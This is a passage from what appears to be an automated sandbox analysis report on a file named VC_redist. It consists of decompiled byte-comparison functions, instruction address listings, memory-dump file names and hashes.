											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                                                          0x00040662
                                                                          0x00040662
                                                                          0x00040668
                                                                          0x000406ef
                                                                          0x000406f1
                                                                          0x000406f3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000406f9
                                                                          0x000406ff
                                                                          0x00040786
                                                                          0x00040788
                                                                          0x0004078a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040790
                                                                          0x00040796
                                                                          0x0004081d
                                                                          0x0004081f
                                                                          0x00040821
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040827
                                                                          0x0004082d
                                                                          0x000408b4
                                                                          0x000408b6
                                                                          0x000408b8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000408be
                                                                          0x000408c4
                                                                          0x0004094b
                                                                          0x0004094d
                                                                          0x0004094f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004095b
                                                                          0x000409e3
                                                                          0x000409e5
                                                                          0x000409e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000409ed
                                                                          0x000409f3
                                                                          0x00040a7a
                                                                          0x00040a7c
                                                                          0x00040a7e
                                                                          0x00040a7e
                                                                          0x00000000
                                                                          0x00040a7e
                                                                          0x00040a00
                                                                          0x00040a02
                                                                          0x00040a1a
                                                                          0x00040a22
                                                                          0x00040a24
                                                                          0x00040a3c
                                                                          0x00040a44
                                                                          0x00040a46
                                                                          0x00040a5e
                                                                          0x00040a66
                                                                          0x00040a68
                                                                          0x00040a71
                                                                          0x00040a71
                                                                          0x00000000
                                                                          0x00040a68
                                                                          0x00040a4f
                                                                          0x00040a58
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040a58
                                                                          0x00040a2d
                                                                          0x00040a36
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040a36
                                                                          0x00040a0b
                                                                          0x00040a14
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040a14
                                                                          0x00040969
                                                                          0x0004096b
                                                                          0x00040983
                                                                          0x0004098b
                                                                          0x0004098d
                                                                          0x000409a5
                                                                          0x000409ad
                                                                          0x000409af
                                                                          0x000409c7
                                                                          0x000409cf
                                                                          0x000409d1
                                                                          0x000409da
                                                                          0x000409da
                                                                          0x00000000
                                                                          0x000409d1
                                                                          0x000409b8
                                                                          0x000409c1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000409c1
                                                                          0x00040996
                                                                          0x0004099f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004099f
                                                                          0x00040974
                                                                          0x0004097d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004097d
                                                                          0x000408d1
                                                                          0x000408d3
                                                                          0x000408eb
                                                                          0x000408f3
                                                                          0x000408f5
                                                                          0x0004090d
                                                                          0x00040915
                                                                          0x00040917
                                                                          0x0004092f
                                                                          0x00040937
                                                                          0x00040939
                                                                          0x00040942
                                                                          0x00040942
                                                                          0x00000000
                                                                          0x00040939
                                                                          0x00040920
                                                                          0x00040929
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040929
                                                                          0x000408fe
                                                                          0x00040907
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040907
                                                                          0x000408dc
                                                                          0x000408e5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000408e5
                                                                          0x0004083a
                                                                          0x0004083c
                                                                          0x00040854
                                                                          0x0004085c
                                                                          0x0004085e
                                                                          0x00040876
                                                                          0x0004087e
                                                                          0x00040880
                                                                          0x00040898
                                                                          0x000408a0
                                                                          0x000408a2
                                                                          0x000408ab
                                                                          0x000408ab
                                                                          0x00000000
                                                                          0x000408a2
                                                                          0x00040889
                                                                          0x00040892
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040892
                                                                          0x00040867
                                                                          0x00040870
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040870
                                                                          0x00040845
                                                                          0x0004084e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004084e
                                                                          0x000407a3
                                                                          0x000407a5
                                                                          0x000407bd
                                                                          0x000407c5
                                                                          0x000407c7
                                                                          0x000407df
                                                                          0x000407e7
                                                                          0x000407e9
                                                                          0x00040801
                                                                          0x00040809
                                                                          0x0004080b
                                                                          0x00040814
                                                                          0x00040814
                                                                          0x00000000
                                                                          0x0004080b
                                                                          0x000407f2
                                                                          0x000407fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000407fb
                                                                          0x000407d0
                                                                          0x000407d9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000407d9
                                                                          0x000407ae
                                                                          0x000407b7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000407b7
                                                                          0x0004070c
                                                                          0x0004070e
                                                                          0x00040726
                                                                          0x0004072e
                                                                          0x00040730
                                                                          0x00040748
                                                                          0x00040750
                                                                          0x00040752
                                                                          0x0004076a
                                                                          0x00040772
                                                                          0x00040774
                                                                          0x0004077d
                                                                          0x0004077d
                                                                          0x00000000
                                                                          0x00040774
                                                                          0x0004075b
                                                                          0x00040764
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040764
                                                                          0x00040739
                                                                          0x00040742
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040742
                                                                          0x00040717
                                                                          0x00040720
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004066e
                                                                          0x0004066e
                                                                          0x00040675
                                                                          0x00040677
                                                                          0x0004068f
                                                                          0x0004068f
                                                                          0x00040697
                                                                          0x00040699
                                                                          0x000406b1
                                                                          0x000406b1
                                                                          0x000406b9
                                                                          0x000406bb
                                                                          0x000406d3
                                                                          0x000406d3
                                                                          0x000406db
                                                                          0x000406dd
                                                                          0x000406e6
                                                                          0x000406e6
                                                                          0x00000000
                                                                          0x000406dd
                                                                          0x000406c1
                                                                          0x000406c4
                                                                          0x000406cd
                                                                          0x00040225
                                                                          0x00040225
                                                                          0x00041016
                                                                          0x00041016
                                                                          0x00000000
                                                                          0x000406cd
                                                                          0x0004069f
                                                                          0x000406a2
                                                                          0x000406ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000406ab
                                                                          0x0004067d
                                                                          0x00040680
                                                                          0x00040689
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040689

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction ID: e22f10139d5436484c45534c40b0ea176a44a24eb7dd592973c8e19d1b7fb9c5
                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction Fuzzy Hash: F5C1E5B22091A309DFAD4679D53413EBAE06FA27B131A57BDD5B3DB0C0EE30C524D624
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00040A97 Relevance: .3, Instructions: 341COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00040A97(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                                                          0x00040a97
                                                                          0x00040a97
                                                                          0x00040a9d
                                                                          0x00040b25
                                                                          0x00040b27
                                                                          0x00040b29
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040b2f
                                                                          0x00040b35
                                                                          0x00040bbc
                                                                          0x00040bbe
                                                                          0x00040bc0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040bc6
                                                                          0x00040bcc
                                                                          0x00040c53
                                                                          0x00040c55
                                                                          0x00040c57
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040c5d
                                                                          0x00040c63
                                                                          0x00040cea
                                                                          0x00040cec
                                                                          0x00040cee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040cfa
                                                                          0x00040d82
                                                                          0x00040d84
                                                                          0x00040d86
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040d8c
                                                                          0x00040d92
                                                                          0x00040e19
                                                                          0x00040e1b
                                                                          0x00040e1d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040e23
                                                                          0x00040e29
                                                                          0x00040eb0
                                                                          0x00040eb2
                                                                          0x00040eb4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040ec2
                                                                          0x00040ec4
                                                                          0x00040edc
                                                                          0x00040ee4
                                                                          0x00040ee6
                                                                          0x0004063f
                                                                          0x00040647
                                                                          0x00040649
                                                                          0x00040656
                                                                          0x00040656
                                                                          0x00000000
                                                                          0x00040649
                                                                          0x00040ef3
                                                                          0x00040639
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040639
                                                                          0x00040ecd
                                                                          0x00040ed6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040ed6
                                                                          0x00040e36
                                                                          0x00040e38
                                                                          0x00040e50
                                                                          0x00040e58
                                                                          0x00040e5a
                                                                          0x00040e72
                                                                          0x00040e7a
                                                                          0x00040e7c
                                                                          0x00040e94
                                                                          0x00040e9c
                                                                          0x00040e9e
                                                                          0x00040ea7
                                                                          0x00040ea7
                                                                          0x00000000
                                                                          0x00040e9e
                                                                          0x00040e85
                                                                          0x00040e8e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040e8e
                                                                          0x00040e63
                                                                          0x00040e6c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040e6c
                                                                          0x00040e41
                                                                          0x00040e4a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040e4a
                                                                          0x00040d9f
                                                                          0x00040da1
                                                                          0x00040db9
                                                                          0x00040dc1
                                                                          0x00040dc3
                                                                          0x00040ddb
                                                                          0x00040de3
                                                                          0x00040de5
                                                                          0x00040dfd
                                                                          0x00040e05
                                                                          0x00040e07
                                                                          0x00040e10
                                                                          0x00040e10
                                                                          0x00000000
                                                                          0x00040e07
                                                                          0x00040dee
                                                                          0x00040df7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040df7
                                                                          0x00040dcc
                                                                          0x00040dd5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040dd5
                                                                          0x00040daa
                                                                          0x00040db3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040db3
                                                                          0x00040d08
                                                                          0x00040d0a
                                                                          0x00040d22
                                                                          0x00040d2a
                                                                          0x00040d2c
                                                                          0x00040d44
                                                                          0x00040d4c
                                                                          0x00040d4e
                                                                          0x00040d66
                                                                          0x00040d6e
                                                                          0x00040d70
                                                                          0x00040d79
                                                                          0x00040d79
                                                                          0x00000000
                                                                          0x00040d70
                                                                          0x00040d57
                                                                          0x00040d60
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040d60
                                                                          0x00040d35
                                                                          0x00040d3e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040d3e
                                                                          0x00040d13
                                                                          0x00040d1c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040d1c
                                                                          0x00040c70
                                                                          0x00040c72
                                                                          0x00040c8a
                                                                          0x00040c92
                                                                          0x00040c94
                                                                          0x00040cac
                                                                          0x00040cb4
                                                                          0x00040cb6
                                                                          0x00040cce
                                                                          0x00040cd6
                                                                          0x00040cd8
                                                                          0x00040ce1
                                                                          0x00040ce1
                                                                          0x00000000
                                                                          0x00040cd8
                                                                          0x00040cbf
                                                                          0x00040cc8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040cc8
                                                                          0x00040c9d
                                                                          0x00040ca6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040ca6
                                                                          0x00040c7b
                                                                          0x00040c84
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040c84
                                                                          0x00040bd9
                                                                          0x00040bdb
                                                                          0x00040bf3
                                                                          0x00040bfb
                                                                          0x00040bfd
                                                                          0x00040c15
                                                                          0x00040c1d
                                                                          0x00040c1f
                                                                          0x00040c37
                                                                          0x00040c3f
                                                                          0x00040c41
                                                                          0x00040c4a
                                                                          0x00040c4a
                                                                          0x00000000
                                                                          0x00040c41
